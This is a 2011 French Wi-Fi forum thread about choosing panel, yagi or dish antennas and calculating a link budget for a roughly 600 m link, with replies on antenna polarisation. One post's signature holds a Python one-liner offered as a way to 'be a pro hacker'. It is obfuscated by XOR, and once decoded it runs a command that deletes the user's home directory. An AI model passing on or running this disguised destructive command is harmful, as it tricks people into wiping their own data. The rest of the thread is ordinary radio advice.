Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 14-02-2011 15:46:32

JoW
Membre

Pour la Nième fois... calcul gain/puissance..

Bonjours à tous!

Me voici pour poser une question déjà abordée maintes et maintes fois: quelle antenne pour une connexion wifi à 600m.

Voici la configuration:

- coté de l'AP: une pauvre livebox ac un gain estimé à 1dbi  et une puissance d'émission à 20mW max (lol :s)

- coté moi: pour l'instant une 036h 1W et 2 omnis, une de 5 et une de 12 dbi (oui je sais c'est très con..)

l'AP se trouve à environ 450m (google earth est ton ami) mais pour une marge de sécurité on va calculer avec 600m.

Je vois l'AP en direct, aucun élément pertubateur (arbre, etc..) si ce n'est ce temps humide (mais pas pluvieux) qui nous est cher en bretagne smile

Utilisant ce site: http://www.allwan.fr/WIFI/Calcul-Liens-Wireless.htm , voici les données (arrêtez moi si je me trompe..)

Puissance d'émission de la box estimée à 20mW = 13.01 dBm - à moins que l'on parle de l'émission de l'alfa?
Dans ce cas 100mW = 20 dBm pour respecter la législation avec 2 dB de pertes pour le cable
Peut importe l'antenne: 2m de cable = 2 dB de perte
Distance de 600m = -95.963 dB (on arrondi à 96)
Sensibilité de l'alfa à 1Mbps = -99dBm

Dans le doute, le calcul se fera de la façon la moins avantageuse, c-a-d en utilisant les valeurs de la box en émission

Hypothèse n°1: panneau de 15dBi
http://www.mhzshop.com/shop/index~sid~6 … 218212.htm

Ce qui me donne (théoriquement) 30 dB de marge, parfait pour une connexion stable à 11Mbps, même si on enlève 10dB pour l'humidité et le reste

Hypothèse n°2: Yagi de 18dBi (bon, avec celle là je sais qu'elle fonctionnerait ^^)
http://cgi.ebay.de/SUPER-Wifi-Antenna-Y … 35af7c6910

Ce qui me donne (théoriquement) 33dB de large, comme plus haut mais en plus certain.. Mais je trouve étrange 35° H/V pour une 18dBi...

Hypothèse n°3: l'antenne radar de 13 dBi (13 dBi pour un aussi petit truc.. je suis comme la fosse: ... bon ok j'arrête)
http://rover.ebay.com/rover/1/709-53476 … 3cb39896a0

J'ai quand même une marge de 28 dB ce qui est plus de suffisant, en admettant que le gain annoncé soit au rdv.. Doute mais vendeur sérieux, c'est chez lui que j'avais acheter mon alfa et mes 2 antennes donc je peut tenter le coup.

Que me conseillez-vous? Je sais qu'il faut encore retirer entre 5 et 20 dBm pour la marge sur bruit en fonction du temps, mais dans tous les cas en 1Mbps tout devrait fonctionner correctement.

Alors, un avis? un conseil?

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 14-02-2011 23:13:05

antares145
Membre d'honneur
Site Web

Re : Pour la Nième fois... calcul gain/puissance..

Salut !

Que voilà un post complet et détaillé, ça fait plaisir à lire smile

Les calculs m'ont l'air corrects, moi je mettrais quand même 2 dBi à la Box et j'oublierais les pertes de câble (qui sont moins importantes que 1 dB par mètre, sauf si ton câble est vraiment moisi).
Tu peux évaluer ton bilan dans les 2 sens :

Box > Alfa : 13 - 96 + {13,15,18} + 2 = {-68,-66, -63} > -99       OK, + de 30 dB de marge
Alfa > Box : 20 - 96 + {13,15,18} + 2 = {-61,-59,-56}  > -80 (estimé)        OK, un peu moins de 30 dB de marge

Vu les arrondis et les marges que tu as pris un peu partout, je pense qu'on est bons (et que ça couvre les pertes non mentionnées : multipath, atténuation,...).

Pour le choix de l'antenne, je me méfie un peu d'eBay et l'antenne Patch (panneau) de chez MHzShop a l'air pas mal. Le gain est suffisant, elle est pas trop ch*ante à pointer et le diagramme de rayonnement a l'air correct (en plus Doradus c'est une bonne marque).
La Yagi à 18 dBi, je suis comme toi sceptique quant à l'ouverture, quand on regarde le diagramme de rayonnement c'est un peu moins propre (en horizontal) donc elle ne m'emballe pas trop.
La mini-parabole, je t'avoue que je connais pas trop ces modèles, même si la parabole permet d'avoir rapidement un très bon gain (malgré une taille réduite). Bon, de nouveau c'est eBay et 45 euros pour une offre groupée carte + antenne, ça ne m'inspire pas plus que ça...

Idéalement, il faudrait aussi une antenne directrice en réception, mais je ne sais pas si c'est possible de changer celle de la Livebox hmm

Dernier point : à 1 MBps en WiFi, à cause de l'overhead le réseau est limite utilisable, donc calcule pour avoir au moins 6 voire 11 Mbps théoriques, sinon tu seras déçu... Au pire, s'il te manque une dizaine de dB tu peux mettre un ampli en réception (côté Alfa) et booster un peu la puissance d'émission (je dis bien "un peu" !) smile

#3 15-02-2011 11:22:10

JoW
Membre

Merci pour tes conseils smile

Effectivement je vais faire l'impasse sur la yagi.
En ce qui concerne l'antenne radar sur ebay j'ai déjà passé plusieurs commandes avec ce vendeur (2 alfa 036H 1W + 2 omnis 5dBi + 1 omni 12 dBi et une yagi 16 dBi (pour un amis)) et j'ai toujours été satisfait donc ce n'est pas un problème en soit.

L'antenne radar on oubli aussi car j'ai déjà une omni de 12dBi.. et 2 dBi de plus ce n'est pas négligeable..

J'aurai cependant une question concernant l'antenne panneau et son diagramme de radiation:
http://www.stelladoradus.com/pdfs/2.4/2 … -06%29.pdf

Que signifient les "co-polar" et "cross-polar"? S'agit-il de la polarisation de l'antenne? Je croyais que seul les antennes hélicoïdales étaient polarisées?

Je me permet aussi de te poser une question concernant un site que tu recommande dans un autre post, et j'y ai trouvé une antenne panneau vraiment bien (angle d'ouverture H/V de 70°/25° pour 17dBi)
http://jetztfunkts.de/antennen/17dbi-pa … 24ghz.html
Bon, c'est un connecteur N-femelle donc il faut un adaptateur N-femelle / RP-SMA-Plug genre:
http://www.mhzshop.com/shop/index~sid~8 … 475592.htm

Par contre je connais pas la marque (sur mhzshop c'est une doradus donc on est tranquil sur la qualité) et les délai de livraison est indiqué en jaune: toi qui les connais, si je la commande demain tu as une idée de combien de temps ca mettrait à arriver? Parce-que je parle allemand comme une vache espagnole ^^

Merci en tout cas pour le temps que vous passez tous à lire mes pavés smile

Edit:

y'a bien cette antenne là:
http://www.mhzshop.com/shop/index~sid~8 … 053468.htm mais bon angle H/V de 20° quand l'allemande fait 70/25.. après sur le site allemand y'as pas la marque ni de diagramme..

Dernière modification par JoW (15-02-2011 11:45:18)

#4 15-02-2011 23:51:29

spawn
Modérateur

Bonsoir.

Ce que j'ai expérimenté des antennes panneau en tant qu'antennes directionnelles me pousse à vous les déconseiller.

J'aurai un problème à vous soumettre.
Un petit dessin valant mieux qu'un long discours, voici un petit schéma de ma configuration :

|       MM             ^
                                                 |       MM              |
                                      ......nnnnn/////////////          |    30 m
....XX........................nnnnnn///////////////////////          v

<--------------------------------------------->
                          1.6 km              <--->
                                                   5 m

En marron, la terre représente une grande plaine et une colline comme à Minas Tirith..
En rouge, les chambres respectives de deux amis.
En vert le sapin qui les empêche de se voir directement.

Avec une parabole +18dBi, un WRT54G et des clés usb WiFi, un des pc est un portable, donc carte WiFi intégrée, peut on établir un réseau correct entre ces deux chambres ?

( Je ne vous embête pas avec le comment, je saurai. C'est le calcul des PIRE, gains et tout le tralala qui m'échappe encore un peu. Qualitativement, en bourrinant, ca passe ? )

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 16-02-2011 00:53:54

antares145
Membre d'honneur
Site Web

JoW a écrit :

Que signifient les "co-polar" et "cross-polar"? S'agit-il de la polarisation de l'antenne? Je croyais que seul les antennes hélicoïdales étaient polarisées?

De mémoire c'est ca, co-polar et cross-polar sont les 2 axes de polarisation (mais je sais plus lequel correspond à quoi). Pour la polarisation en général, seules les antennes hélicoïdales ont une polarisation circulaire, mais la grosse majorité des yagis par exemple a une double polarisation due au croisement des éléments (les éléments horizontaux polarisent horizontalement, idem pour les verticaux) wink

Je me permet aussi de te poser une question concernant un site que tu recommande dans un autre post, et j'y ai trouvé une antenne panneau vraiment bien (angle d'ouverture H/V de 70°/25° pour 17dBi)
[...]
Par contre je connais pas la marque (sur mhzshop c'est une doradus donc on est tranquil sur la qualité) et les délai de livraison est indiqué en jaune: toi qui les connais, si je la commande demain tu as une idée de combien de temps ca mettrait à arriver? Parce-que je parle allemand comme une vache espagnole ^^

Ils parlent très bien anglais, si ça peut t'aider big_smile Pour les délais, ils envoient ça avec DHL, donc compte entre 2 et 5 jours (en tout cas c'est mon expérience).
Pour le modèle et le diagramme de rayonnement, j'en sais pas plus que toi mais tu peux leur demander par mail ils devraient pouvoir te répondre wink Si l'anglais te pose un problème je peux leur poser la question mais ça sera pas avant ce WE, j'suis un peu à la bourre sur d'autres trucs...

Suite à la remarque de Spawn, je précise que je n'ai pas beaucoup d'expérience avec les antennes directionnelles, donc même si sur le papier ça a l'air OK je ne peux pas garantir qe ça marchera impeccablement en vrai smile

@spawn : sans vouloir remettre en cause tes talents d'artiste, ce genre de "schémas" sur un forum est foireux à cause de l'espacement entre les caractères qui varie d'un navigateur à l'autre. Donc ça décale dans tous les sens wink
Bon, sinon j'ai pas la tête à faire tous les calculs ce soir (j'éditerai demain pour donner les résultats) mais je dirais qu'à priori s'il n'y a que le sapin ça devrait passer. Ca va surtout dépendre de la clé USB en réception (et de sa sensibilité), en fait. Ah, et aussi d'un éventuel mur/fenêtre dans le chemin, mine de rien ça joue smile

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]